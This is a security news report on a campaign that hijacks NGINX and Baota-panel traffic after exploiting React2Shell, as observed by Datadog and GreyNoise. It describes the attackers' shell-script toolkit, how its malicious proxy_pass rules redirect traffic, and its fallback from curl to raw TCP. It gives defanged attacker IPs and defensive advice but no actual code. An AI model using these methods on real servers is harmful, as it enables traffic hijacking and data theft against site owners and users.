Cybersecurity researchers have uncovered an active web traffic hijacking campaign actively compromising NGINX installations and popular management panels like Baota (BT). The sophisticated attack redirects legitimate user traffic through infrastructure controlled by threat actors, raising significant concerns for web security. Datadog Security Labs identified that these malicious actors are leveraging the recent React2Shell (CVE-2025-55182) vulnerability, which carries a critical CVSS score of 10.0, to deploy their campaign.
The campaign, observed by Datadog Security Labs, specifically targets Asian Top-Level Domains (TLDs) such as .in, .id, .pe, and .bd, as well as .th. Additionally, it targets Chinese hosting infrastructure, specifically the Baota Panel, a widely used web server management tool. Government and educational TLDs, including .edu and .gov, have also been identified as targets, indicating a broad scope of interest for the attackers.
NGINX Web Traffic Hijacking Campaign Details
The methodology involves the injection of malicious NGINX configurations through the use of shell scripts. These scripts manipulate NGINX, a popular open-source web server, reverse proxy, and load balancer. The core of the attack lies in custom “location” directives within the NGINX configuration. These directives are designed to intercept incoming user requests directed at specific URL paths. Once intercepted, the traffic is then rerouted to domains controlled by the attackers using the “proxy_pass” directive, effectively hijacking the user’s connection.
These malicious scripts are part of a larger, multi-stage toolkit. This toolkit is designed to ensure persistence within compromised systems and to facilitate the creation of the malicious configuration files. Components of this toolkit include several distinct shell scripts, each with a specific role in the attack chain. One script, ‘zx.sh’, acts as the orchestrator, initiating the execution of subsequent stages by utilizing legitimate utilities like ‘curl’ or ‘wget.’ If these programs are blocked, it resorts to establishing a raw TCP connection to send HTTP requests.
Another script, ‘bt.sh’, is specifically designed to target the Baota (BT) Management Panel environment. Its function is to overwrite existing NGINX configuration files with malicious ones. Complementing this is ‘4zdh.sh,’ which automates the discovery of common NGINX configuration file locations and attempts to minimize errors during the creation of new, malicious configurations. A more narrowly focused script, ‘zdh.sh,’ concentrates on NGINX configurations within Linux or containerized environments and specifically targets TLDs like .in and .id.
Finally, the ‘ok.sh’ script serves a reporting function, generating a log of all the actively implemented NGINX traffic hijacking rules within the compromised system. The collective purpose of this toolkit is to enable the threat actors to gain control over web traffic flow and potentially exfiltrate sensitive data or redirect users to malicious sites.
Exploitation Activity and Threat Actor Motives
The disclosure of this campaign comes at a time when exploitation attempts for the React2Shell vulnerability are notably high. GreyNoise, a cybersecurity firm, has reported that two specific IP addresses, 193.142.147[.]209 and 87.121.84[.]24, are responsible for a significant 56% of all observed exploitation attempts. These attacks surged approximately two months after the React2Shell vulnerability was publicly disclosed.
Between January 26 and February 2, 2026, researchers identified a total of 1,083 unique source IP addresses participating in React2Shell exploitation. GreyNoise further noted that the dominant sources deploy distinct post-exploitation payloads. One payload is observed to download cryptomining binaries from staging servers, while another establishes direct reverse shells to the scanner IP. This suggests that the threat actors are interested in interactive access to compromised systems, rather than solely relying on automated resource extraction, which could indicate more advanced or targeted operations.
This ongoing activity follows closely on the heels of another discovered cybersecurity incident. Researchers recently uncovered a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway infrastructure. This campaign utilized tens of thousands of residential proxies and a single Microsoft Azure IP address (“52.139.3[.]76”) to identify login panels. GreyNoise highlighted that this campaign operated in two distinct modes: a large-scale distributed operation for discovering login panels using proxy rotation, and a more concentrated effort hosted on AWS for enumerating the versions of identified gateways.
The complementary objectives of finding login panels and enumerating their versions point towards a well-coordinated reconnaissance effort, potentially in preparation for further exploitation or widespread compromise. The consistent targeting of robust web infrastructure, such as NGINX and gateway solutions, by various threat actors underscores the persistent need for vigilance and robust security practices in the digital landscape.
Looking ahead, organizations utilizing NGINX installations and management panels like Baota are strongly advised to review their configurations and apply any available security patches immediately to mitigate the risk of web traffic hijacking. The ongoing nature of these attacks suggests that threat actors will likely continue to refine their methods, making proactive security measures and continuous monitoring essential.